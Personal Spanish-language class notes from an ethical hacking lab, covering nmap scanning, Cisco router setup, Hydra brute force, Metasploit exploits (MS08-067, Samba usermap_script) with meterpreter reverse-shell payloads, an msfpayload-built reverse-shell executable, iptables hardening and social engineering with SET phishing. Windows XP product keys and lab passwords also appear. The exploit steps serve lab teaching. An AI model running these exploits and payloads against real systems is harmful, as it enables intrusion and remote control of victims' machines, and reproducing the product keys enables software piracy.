nombres
Maquina virtual 1
nombre:linux
user: msfadmin
admin: msfadmin
para apagar: sudo su poweroff
maquina virtual 2
en lab eth2
abrir el archivo para los seriales
nombre: windowsxp
clave: usuario.123@
porbar usuario.123"
F7YTD-TJ9MX-DQ7DV-HRVCF-DRMRY
B77QF-DP27W-4H68R-72B48-78RPD
V2C47-MK7JD-3R89F-D2KXW-VPK3J
Server
en lab eth2
nombre: windows2008srv
windows server 1008 r2 enterprise complete installation
--> personalizada avanzada
nombre: kali
tipo:linux
version: Debian 64
800 RAM
40GB Disco minimo
nombre en blanco para que diga localhost
pass: usuario.123" o usuario.123@
Maquina windows xp
comandos en kali linux
service network
poner la tarjet a apuente
usuario :root
ifconfig eth0 192.168.100.212 netmask 255.255.255.0 ping 100.120
aplicaciones-> kalii linux nmap --> escaneo de la red, deteccion de las mac addres, puertos abiertos, tipo de SO
#nmap -sP -oN resultado.txt 192.168.100.0/24 -> para ver que hosts estan arriba o funcionando
ls
gedit resultado.txt --> ver las ips arriba
-sP barrido de la red mediante Ping /24 a las 65000 maquinas
***Advanced IP Scanner
ipconfig de la maquina principal
lanzar con la ip 192.168.100.0/24
**** Nmap
Command: nmap -sS -sV -O 192.168.100.120 PUERTOS ABIERTOS --> ATAQUE MAS fuerte
Target: 192.168.100.100-126
Command: nmap -sS -sV -O 192.168.100.100-126
protocolos icmp --> ping tracert
-------------------------MARZO 5
Primera etapa
1.- footprinting --> determinar objetivo
2.- escaneo--> puertos
3.- enumeracion --> enumeramos nuestros objetivos
4.- hackeo/ataque: GNS3
configuracion en kali --> 192.168.10.11/24 GATEWAY: 192.168.10.10
Router--> hostname PruebaEh
Ip: 192.168.10.10/24
configurar Enable secret: cisco
configurar vty 04 --> cisco
en el router
conf ter
hostname nombre
interface fast 0/0
ip address 192.168.10.10 255.255.255.0
no shut down
do sh run
do ping
---------cambiar contraseña kali linux: passwd -> nueva pass = 12345
---------Habilitar line vty y secret
conf ter
Enable secret cisco
line vty 0 4
password cisco
Login
Exit
wr --> escribir
---------telnet desde kali
en el terminal
telnet 192.168.10.10
password: cisco
En kali go to Aplicaciones-> Kali Linux -> Top 10 securyties tools-> wireshark
En wireshark luego de haberse logeado con telnet ir a:
Analyce -> Follow TCP Stream
Configuracion SSH a mano 6 lineas de configuracion Router CISCO
-------- en el router cisco service password-encryption
Nuevas pass: Py2911x
Z9911x
---------------Ataque de fuerza bruta
SISTEMA EN EL CUAL SE UTLIZAN TODAS LAS POSIBILIDADES DE UNION DE PALABRAS PARA ACCEDER A UN SISTEMA Y ESCALAR PRIVILEGIOS
CISCO AUDITING TOOL
KALI-> ATAQUES CON CONTRASEÑA-_> ATAQUES CON CONEXION->HYDRA- GTK
en kali: cge.pl 192.168.10.10 1 --> ver si CISCO es suseptible a cualquiera de los ataques listados en
Aplicaciones-> Kali Linux-_> Analisis de vulnerabilidades->herramientas cisco-->cisco-global-exploiter
*****************SSH
HOSTname
interface fast 0/0
no shut
enable secret pass
enable password pass
service encryption
domain-name domain.cl
crypto key generate rsa
1024
ssh time-out 15
ip ssh authentication-retries 2
username root password pass
line vty 0 4
transport input ssh
login local
sh ip ssh
disconnect ssh [numero vty]
ip ssh version 2
debug ip ssh
******************META EXPLOIT
windows 192.168.1.3
en kali 192.168.1.2
service postgresql start
service metasploit start
NAMP DETECTAMOS A LA VICTIMA
scanning
comando: db_nmap -sV -O 192.168.1.3 -->
search msrpc
search ms08-067 -->
exploit-->
msf > services
NESUS nos da el id de la vulnerabilidad
NESUS vs nmap -->
use exploit/windows/smb/ms08_067_netapi--> ejecuta el exploit
configurar las opcs
set RHOST 192.168.1.3 (RemoteHOST)
pilot -> codigo que se va aejecutar, como vamos a atacar a la maquina
set payload windows/meterpreter/reverse_tcp --> inyectar codigo
pasos para encontrar una vulnerabilidad: scaneo
kali---> 192.168.1.2
xp --> 192.168.1.3
************************************************METAEXPLOIT*************************************
start postrgres
start metasploit
nmap-_> dbn_map
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOS 192.168.1.3
show payloads
---> metter preter -_> enviar codigo tener control de la machine en windows en linux no
set payload windows/meterpreter/reverse_tcp --> inyectar codigo setear payload que quiero ejecutar
show options --> que necesito configurar
set LHOST 192.168.1.2 --> HOST A LA QUE SE LE VA A DAR EL CONTROL
exploit
/// OTRO PAYLOAD
search -h --> como se pueden buscar ciertos objetivos
serach type
-------------------------------------------------- UBUNTU ESPLOIT
linux metasploitable 192.168.1.2 user/pass: msfadmin
kali 192.168.1.3
primer paso: foot printing
HERDERING SISTEMAS LINUX
IPTABLES -_> FIREWALL que viene enbebido dentro de linux
--> arrancar postgresql y metasploit
en msf> nmap -sS -sV 192.168.1.2
search samba
------->exploit a 192.168.1.2
msf> use exploit/multi/samba/usermap_script
set RHOST
set LHOST
EXPLOIT
WHOAMI
en linux /etc/shadow --> claves de todos los servicios
---> crear usuario en LINUX
user add juanito
ps -ef --> ver procesos
kill [numero_procesos]
------maquina como pivote
*************************ATAQUE A JAVA
investigar ataque mysql/apache
******************IRC comando de comunicacion en real time
*******************************HARDENING
Servicios innecesarios
ps -ef --> ver servicios
PASOS DEL HARDENING:
1.- Poner un firewal
2.- poner un antivirus
3.- actualizar
4.- bajar servicios innecesarios
unrealircd --> irc
---------------------------------------Miercoles 12
Cuadrante de gardner --> el firewall mejor es checkpoint
linux metasploitable 192.168.1.2 user/pass: msfadmin
kali 192.168.1.3
en LINUX
PARA BLOQUEAR ICMP
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
PERMITIR ICMP
iptables -A INPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT
iptables -A OUTPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT
IPTABLES -L --> VER POLITICAS IP TABLES
********************************************************Para que haga nuevamente ping
primero --> iptables -P INPUT/OUTPUT ACCEPT
Y LUEGO --> iptables -A INPUT/OUTPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j DROP
*********************************************************
*************************se crea un archivo .sh con el nombre mifirewall.sh con las reglas y se corre haciendo sh mifirewall.sh
puerto IRC: Puerto 6667
***********************************HACKING ETICO RED INALÁMBRICA**************
Espectro electromagnetico
Kali y wifi Slax
WI-FI (Woreless Fidelity) creada por WECA (Wireless Ethernet Compability Alliance)
802.11 a/b/g/n -->
sistemas inalambricos trabaja en la capa de enlace de datos capa 2 del modelo OSI
*************************************** WIRELESS HACKING
wap AS Enterprise es la mejor proteccion
***************************************************************INGENIERIA SOCIAL
Aprovechar de cualquier tipo de relacion social de amistad, relacion laboral, etc.
Ingenieria social se divide en dos partes/tipos:
1 Factor humano
2 Interviene el cmputador- tecnologico
cohersion: una persona se haga pasar por otra
fases:
1 Research -- investigacion, reunir informacion acerca del objetivo
2 hook: enganche o anzuelo: movimiento inicial, iniciar una conversacion--> fin investigacion
3 Play actuar: relacion mas fuerte
4 Exit: Salida esta es la ultima fase del ataque de ingenieria social.
Piggybacking: engaño, entrar a un area restringida de la empresa
Eersonating (hacerce pasar por alguien )
el espionaje: escucha no autorizada -- sniffer
**********************Revertir la ingenieria social
*********************************************************Ingenieria social basada en la computadora
POP UP WinDOWS
Phishing (pesca) reemplezar paginas, contenidos de correo electronico
herramientas SET:
ActiveX -->
KALI--_> msfcon 9
puerto 444
cd /root
cd .set
ls
cd template.pdf oficiourgente.pdf
sl
ls
http://www.securitytube.net/video/8050
100.205
gateway 100.15
*******************************************Lunes 24 de Marzo ataque Windows 7
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 x > /root/exploit.exe -> se crea en el escritorio copiar esto a windows
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.2
exploit